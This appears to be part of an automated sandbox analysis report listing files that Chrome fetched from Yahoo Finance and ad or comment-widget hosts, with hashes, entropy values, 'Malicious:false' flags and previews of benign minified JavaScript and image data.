                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:g5Ww5dw4MwlZEa09wmSitQjw4EHG9cBKtVns8RHtm:W5aUl/06mukja7Htm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:12732500BC8E47693F0D777BBE88001C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:97865CCE1C0CD35BAC8AC4B42DC9C6C394DA4809
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A03F9A37E34771C42CF7930B2F466EA2077D149F6DBA0E81982E7715A87DD8EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9ED4368E2415EDEFA87BB461BE701E268F93C076852660B2F3B2E661C25D66CDDDA0DBC236410361935365DD954FE1DDF07541CB44557DE25E85FB73BC2FE2BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-content")[0],s=a&&a.getElementsByTagName("a")[0],n=s&&s.getAttribute("data-uuid"),o=function(t){var e;try{e=JSON.parse(window.localStorage.getItem(t))||{}}catch(t){}return e}(t);if(n!==o)e.classList.remove("D(n)"),Array.prototype.slice.call(e.getElementsByClassName("featurebar-close-button")).forEach((function(e){e.addEventListener("click",(function(){!function(t,e){try{window.localStorage.setItem(t,JSON.stringify(e))}catch(t){}}(t,n)}))}))}if(e.classList&&e.classList.contains&&e.classList.contains("auto-play")){var r=window.getComputedStyle(e).height,l=Array.prototype.slice.call(e.getElementsByClassName("featurebar-content")),i=0,c=(i+1)%l.length;function u(){setTimeout((function(){l[i].style.transitionDuration=".8s",l[i].style.transform="
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9109)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9110
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4893768519886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3C/2Ec98dS53u/kKX2XP2+y9rS4puu+u5x5vzFExJenq/NNsZ/tYg/76YnuxZJ4r:3q7i8dS53uce2/pyxD8uDTFwRuYgz6nO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6DB543C4F1DE9AC5A02419EBF40BD7B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:404D7CDB52535BECD03D014A223C51EA0ED6BA59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2779A49A4EE8BFC60B393F211E54A05356AB5FC24B32852BBA9E93D965205B12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E469028E330B5B382B7D942007102F397B020A225B56A8E352DF092CF193C742B3780637DE10CDA69D1726E481ED5225B18C9BA55EE9909D14328C4E14E1B7F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/HeatMap.BiDNZzIN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as fe,c as q,b as S,e as D,j as y,d as T,f as I,i as M,q as g,k as b,l as E,u as B,g as j,a as F,Q as ce,p as R,G as ue,a1 as _e,x as de,n as oe,t as Z,h as J,L as w,m as K}from"./scheduler.Dsuh-FKt.js";import{S as me,i as he,t as p,g as O,a as v,e as W,c as U,b as V,m as N,d as A}from"./index.CvwOawEI.js";import{e as X}from"./each.CI2tb2RB.js";import ge from"./ErrorMsg.Cn69Klh6.js";import{L as pe}from"./Link.vSNQugO0.js";import{S as ae}from"./Spinner.D9ew0_W4.js";import{T as we}from"./Tooltip.CzSuDxyY.js";import{g as Me,u as ve,a as Y}from"./GradientScale.DbBrCr3C.js";const ke=o=>({}),$=o=>({});function x(o,n,l){const e=o.slice();e[0]=n[l],e[39]=l;const t=e[0];e[19]=t.key,e[20]=t.width,e[21]=t.height,e[22]=t.mWord,e[23]=t.lWord,e[24]=t.xlWord,e[25]=t.change,e[26]=t.url,e[27]=t.tickerText,e[28]=t.percentChangeText,e[29]=t.coordinates,e[5]=t.i13nModel;const a=e[29];e[30]=a.x,e[31]=a.y;const h=e[20]<8||e[21]<6;e[32]=h;const r=e[20]<8||e[21]<11;e[33]=r;const u=e[20]<8||e[21]<11;e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4691)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4741
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.327374432154568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:1xrPFk8PZYnxPw7dydAebtBQQ4eqkvmidXKaAGQCP9tnQX9ZHJb:1RPFk8PZYO7QdvbNfNQCDnQrHJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7DC86A3D069C04C258495638958D66A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:94080BE562A35573FDCB725615D3592246279601
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:38FE234D60B2E5252C4E1C9D12B7D67BD1037FE8D1ABC138472394FEF52B6190
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5032B9588AF7B2F52EC9AF8C844A38048CE62968AFB0A127CE4AC1E84B38B8029F5684BF84FA9C4E7C69BF243E003F69E750562BA990E97D8C0468475DBDF129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var __SPOTIM__;(()=>{"use strict";var e={n:o=>{var t=o&&o.__esModule?()=>o.default:()=>o;return e.d(t,{a:t}),t},d:(o,t)=>{for(var n in t)e.o(t,n)&&!e.o(o,n)&&Object.defineProperty(o,n,{enumerable:!0,get:t[n]})},o:(e,o)=>Object.prototype.hasOwnProperty.call(e,o),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},o={};e.r(o);const t=window.__SPOTIM__.lib.react;var n=e.n(t);const s=window.__SPOTIM__.lib.ReactDom;var r=e.n(s);const i=window.__SPOTIM__.SERVICES.configProvider;var a=e.n(i);const c=window.__SPOTIM__.lib["@spotim/launcher-shared/hooks"];function l({counterMessage:e}){const o=void 0===e||e<0,s=(0,c.useHost)();return(0,t.useEffect)((()=>{o||s.childNodes.forEach((e=>{e.nodeType===Node.TEXT_NODE&&e.remove()}))}),[s,o]),o?null:n().createElement(n().Fragment,null,n().createElement("style",null,"\n .messages-count {\n display: inline;\n curso
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (21224)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.349731623672621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:PLX1wtH+NTv0vDckjUhzU0ZppJeiUGg2TD7eC43YU/Us3ZYNbHG3W5AJdME9oPaV:jKtPQOaG3WFaoPaIK/zn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F1DFC75C82E12DFE846D5593978E422A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:12E580A708B09C9A8F4CA7CCBE9DD7DF32EDEE60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:08204982C484FAF6890C60557A4E642971F17625DDDDC0559DC0E3CA728AC9E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:623412E6D454104251215E38A0F365F879EC70F77306769F5FA40E144C0EAB43237D1FE13B92031AD5848071A6A8910F01576F079E1A0904F4D8DD8959D922A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://tpc.googlesyndication.com/safeframe/1-0-40/js/ext.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}},ea=function(a){return a.raw=a},fa="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};da("Object.assign",f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 24 x 24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.312089486802539
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Hy2JSJMlCPAI9eI7N7miqiZov00hnp07om47jSW3lAm0loMX7nR1wKp:Hy2JSqCDsIbTov00hnp07om47jlHevnR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:953C1AC7E3B4E3D58367E20B064034BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FE8BE09EEE45EBF11C4C46918879725C85FE41E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:123988D9B5968899975FF52A55B198E7209D4EC023F3A7462FDA68B52AC2B463
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:70CFDA1C11AC079F51B971C9DD0426895990E350C041DDA60E13D86D38B0D043B5D647F750B7F479270BBA439A7375775BFCEAD62BA210F1E0F8FFE52791B420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.................................................................................................!..NETSCAPE2.0.....!.......,............%...%eZ..4Z............<.a ..&...x..w..........8qT&...aH0D...P\.....1....~.J*...`#..B.5....5..|%..V@.@....Z@....'....5........)..q)...)....n*.....#....n....D...|......g.?..?.......Z.9......$.."..".......q..0 .,E........@..T.)....:L!..!.......,............%..3.".(s...P<>...Rb.........U9...AL..,/......*@.........Vp.O.DB.t.&..A.........M}........u......'tA.....i6..g,...i.~';2..|h.W......|.../'..g....W".'zW.....1....#.6....."J.6J'."...0A!.!.......,............%..E.(:........V2.7*....A.$..^I.q.....RH.....`...........nDR"@ ...k1..0.E!.....H7......../....q~~...0.l/....KXc%...M".)......S..D......"......c.4.|#..$.."."..0..#../..Y.4O.=.....B.0!.!.......,............%..u@e."$..B......\.<.(.....|..A(b.f....{...kJ..D/.H..p\.N(eq0...ds......^..S}.........P...Czy.f.$.......%......).....Z......p;.....e$7"...dQ....3.._.7..r|..#..E>.1....*.$.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (676)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.016237275679697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:JRarJUQrJkvOE4rJw3QR7HS0TcHWEcHbIk68+v++1cyNfCiSYqM:radUQdJHdw3QRD3c2Ec7IkP+GKcyNfCM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DB3BFFAC7FE1310EB604B40D9D75AA67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C6764B24225A76F70442E485DF899F019E39A7A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:250A8E32B679A0D246011D0AA78374EBB39B465E87902AC52D43B2976DBB80F8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C621D45D24E262DF67EDEED62AC0341E40E851114B07346F11A7C3DEC2D34FE1909F07500CA197C57B46A26C2E32557239F881D9C79E3563DE9B6455053434C8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/intersectUtil.DVqOQxux.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const l={beforeview:{root:null,rootMargin:"200px 0px",threshold:[0]},inview:{root:null,rootMargin:"0px",threshold:[0]},coversview:{root:null,rootMargin:"0% 0% -75% 0%",threshold:[0]},fullview:{root:null,rootMargin:"0px",threshold:[1]}};function s({preset:e="inview"}={}){const r=window._nimbus.intersectionObserver=window._nimbus.intersectionObserver??{},o=r[e];return o||(r[e]=new IntersectionObserver(i=>{for(let t=0;t<i.length;t++){const n=i[t],{target:c}=n;c.dispatchEvent(new CustomEvent("intersect",{detail:{entry:n,isIntersecting:n.isIntersecting,observer:r[e]}}))}},l[e]))}function v(e,r={}){return s(r).observe(e),{destroy(){s(r).unobserve(e)}}}export{s as g,v as i};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (28241)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28341
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.268980980631253
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:k46pTzZFRQBbEoSvt/EhziP0M0o5LaIa8d8C+:szZ1oSvqBnTRIx8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BDF5563389F8BE4BFA4016B1C8222F4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7E49D0784173844D6A7A6ECE9C0DC4DC4E3FFA7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AE72534FD8A749E7309C995E5A03461407EE30D211E4E225EEAA875E3E37DD59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:343CAB9893FBEFCF65F209D34BD5D53F5FBF2CA2D86471D7EBCA24999AE1710E56A05FB085464E6287407320006F48F744C8A5DBEB80FA74B3F56FC54A343B29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/puc/creative.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* v1.17.0-pre.Updated : 2024-08-30.DEPRECATED, please use creative based on hb_format targeting */.!function(n){var r={};function o(t){var e;return(r[t]||(e=r[t]={i:t,l:!1,exports:{}},n[t].call(e.exports,e,e.exports,o),e.l=!0,e)).exports}o.m=n,o.c=r,o.d=function(t,e,n){o.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:n})},o.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return o.d(e,"a",e),e},o.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},o.p="",o(o.s=3)}([function(t,e,n){"use strict";e.i=function(t,e){var n=new Image;e&&"function"==typeof e&&(n.addEventListener("load",e),n.addEventListener("error",e));n.src=t},e.a=function(t){return t?(t=encodeURI(t),'<div style="position:absolute;left:0px;top:0px;visibility:hidden;"><img src="'.concat(t,'"></div>')):""},e.j=function(t,e,n){n=r.a(n,e);n.src=t,document.body.appendChild(n)},e.g=function(t,e){var n=new XMLHttpRequest;n.addEventListener("load",function(){e(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.063452167873521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHUXpWFUXJISILRU4GUSyvAZIAdSbFS:H69mc4sl3O4UXpCU2x8wvAZ/b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:827499D87703971F05522FDAD0D0936D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9D77F07F4C14B6A96B3914BDE2873B76818B96AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:383A86B47F8C4B9CAC4035415C5C2F66E2B254A26A507614CBA67EB7230DAF57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DBF2DADC523E7264254C082573F60D5F6EE21E720DE6A49E3222D4F4B11F5433C38CB17C6590172521F3C8CCB0A50C0D3E7AE6DA81385BDB74A75A4CEC119565
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/check.21reEWCG.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9 16.17 4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3002)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.49901448113199
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:AtdRsc4DJCtmonE9yTXUsaswgimTH++YwXgcLuEM6wEecegl0GGLeNpqdYNWMpZU:CdRCJKEaksaswgy+YwXgcLuXrvgv/qqQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:57CBDBB0472B3F07D0F5A610B4958897
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3E54A40275CD5BD91966BCE3418C54BC653620B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:68767FE073E2B1A078D6BA46843BF90672179F38347A6A61814204FF40CCC0A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4EF7727E44486BC22BCEADC861BA8901C6F1D5E2C56F37DD24F41444DD92A253520B7F307E1A495865F1952AE1398F35B1C93AB5B260AD2BF27CB99BDD32CF20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as q,e as F,b as A,t as M,d as H,f as C,j as R,h as V,i as I,q as _,O as h,L as u,k as j,l as z,m as w}from"./scheduler.Dsuh-FKt.js";import{S as G,i as L,t as y,g as P,a as b,e as v,c as B,b as J,m as K,d as Q}from"./index.CvwOawEI.js";import{E as U}from"./error_outline.CkdKfkE_.js";import{I as W}from"./Icon.C8w5V9EK.js";import{t as D}from"./commonUtil.BWwawKjd.js";function O(s){let e,i;return e=new W({props:{icon:U,type:s[6],size:s[8],className:s[13]}}),{c(){B(e.$$.fragment)},l(t){J(e.$$.fragment,t)},m(t,c){K(e,t,c),i=!0},p(t,c){const m={};c&64&&(m.type=t[6]),c&256&&(m.size=t[8]),c&8192&&(m.className=t[13]),e.$set(m)},i(t){i||(y(e.$$.fragment,t),i=!0)},o(t){b(e.$$.fragment,t),i=!1},d(t){Q(e,t)}}}function X(s){let e,i,t,c=D(s[3],s[4])+"",m,r,d,o,n=s[5]&&O(s);return{c(){e=F("div"),n&&n.c(),i=A(),t=F("p"),m=M(c),this.h()},l(a){e=H(a,"DIV",{class:!0,role:!0,"data-testid":!0});var f=C(e);n&&n.l(f),i=R(f),t=H(f,"P",{class:!0});var g=C(t);m=V(g,c),g.forEach(I),f.forEach(I),this.h()}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (594)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.068374723525868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:NjlBmhyycNFso0//9CEeU/D1+j8D1DTsqBu5GncWfohj:Fby2s1/VCY1+j8R3sq8qnfmj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7BA731BD45AB9D25C2313738462B84AD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6DC04674F295E563629498F98FA9A37AC5451923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:75026AD8633CC91319941FBDD63224D47B7A4848B7E3121824FC4F4BE5C30AB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FF03E2CEA81DB4F27E0816D5C07AA0F7DD3472CAF024E8A5477F6FCC31F5FE8C5FB0A7BD5DABF53AD15F8E0E825849B96BD05B99F566DE0CA8427F3EA52330D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/nodes/0.B0UP-sbn.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as l,c as i,u as r,g as u,a as f}from"../chunks/scheduler.Dsuh-FKt.js";import{S as _,i as c,t as p,a as m}from"../chunks/index.CvwOawEI.js";function $(a){let s;const n=a[1].default,e=i(n,a,a[0],null);return{c(){e&&e.c()},l(t){e&&e.l(t)},m(t,o){e&&e.m(t,o),s=!0},p(t,[o]){e&&e.p&&(!s||o&1)&&r(e,n,t,t[0],s?f(n,t[0],o,null):u(t[0]),null)},i(t){s||(p(e,t),s=!0)},o(t){m(e,t),s=!1},d(t){e&&e.d(t)}}}function d(a,s,n){let{$$slots:e={},$$scope:t}=s;return a.$$set=o=>{"$$scope"in o&&n(0,t=o.$$scope)},[t,e]}class S extends _{constructor(s){super(),c(this,s,d,$,l,{})}}export{S as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13825), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.398954797984997
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:Mio+WtRQYFaAkobwgWVXBMuzOlkhvT8MQWxZLzn76k2nppcKv:Mio+WtRQYFaAk0wgWoGOlkhvT8MQ2ZLu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF594D8957F8B396196632F8C23A4110
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0E0FD9BA94DCE7F259F16A43C6C4102BC404B43C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:97208DE68E5F6D734FBE4EC742763C1F957189736ACEB6FA26C6528F3D40F2A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7E1600C60F432B3275F7044DFD5D671AC5325CC7EEBB0419264DD0DA7623CBB8FA04F15C88FA3D10F8D58BD03A206E5E526DB328543E122A85A34065EE897698
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/safe-frame-handler-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[985],{29759:(e,o,n)=>{n.d(o,{l:()=>a});var t=n(46897),i=n.n(t);let r=[];const a=e=>{r.push(e),l()},l=()=>{r.length>0&&(window.Y.SandBox.vendor.msg(JSON.stringify({type:"spotim",messages:r}),i().safeframe.regKey)?r=[]:setTimeout((()=>{l()}),210))}},41708:(e,o,n)=>{n.r(o),n.d(o,{getHostUrl:()=>Z,getSafeframeSizes:()=>j,initSafeFrameSupport:()=>C,isFullScreen:()=>F,observeFrameSize:()=>k});var t=n(96682),i=n(91033),r=n(46897),a=n.n(r),l=n(70655),s=n(29759);const d={expandInProgress:!1,expandFailedSynchronously:!1},c=new Map,v="ow-safeframe-expanded",u="ow-safeframe-collapsed";function f({isFullScreenMode:e=!1,contentToObserve:o,data:n}){var t,i,r,l,s,d;const c=null==o?void 0:o.getBoundingClientRect().height,v=a().safeframe.prevScrollHeight||0;!e&&(c>v+15||c<v-15)&&"expanded"!==(null===(i=null===(t=null===window||void 0===window?void 0:window.$sf)||void 0===t?void 0:t.ext)||void 0===i?void 0:i.sta
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853534452243269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JSXE4Dag5Ne5NOjLj4VMJFJXRzv:W75NHz4i5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C31E6E826F9E785DA9D9EE3F642F9155
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5FA49909AF9DFCB3D02CCE29E1FCA76A2674F564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:34E46A06DC1B7FA8E798B8AB5044D1A3C69110168C1615A4E60B18F5F23E3E72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4A987F544B5DF19CF5533032222A9E2F059B985BB9219A289E6B09FD89C19D2C98D23D7FF1CB6BE217B45D000199E18CC9D7C886998CFF7B1B9074CBF627ADC7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{e as a}from"../chunks/43.BgWy8GOF.js";export{a as start};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 356x180, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.974018089449872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
